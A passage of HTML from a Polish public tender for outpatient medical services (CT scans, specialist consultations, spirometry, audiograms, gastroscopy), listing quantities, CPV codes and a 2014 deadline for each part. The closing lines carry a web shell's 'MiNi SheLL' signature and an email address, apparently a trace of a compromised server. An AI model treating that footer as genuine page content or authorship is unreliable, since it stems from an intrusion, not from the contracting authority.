1	TOMOGRAF KOMPUTEROWY GŁOWY	szt.	2
2	TOMOGRAF KOMPUTEROWY KRĘGOSŁUPA	szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR II KONSULTACJA DIABETOLOGICZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
1	KONSULTACJA DIABETOLOGICZNA	szt.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR III KONSULTACJA NEUROLOGICZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
1	KONSULTACJA NEUROLOGICZNA	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR IV KONSULTACJA PULMUNOLOGICZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
1	KONSULTACJA PULMUNOLOGICZNA	szt.	4
2	SPIROMETRIA	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR V KONSULTACJA  LARYNGOLOGICZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
1	KONSULTACJA LARYNGOLOGICZNA	szt.	60
2	AUDIOGRAM	szt.	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR VI KONSULTACJA GASTROLOGICZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
1	KONSULTACJA GASTROLOGICZNA	szt.	4
2	GASTROSKOPIA	szt.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR VII KONSULTACJA UROLOGICZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Rodzaj Badania	JM	Ilość szacunkowa
1	KONSULTACJA
UROLOGICZNA	szt.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com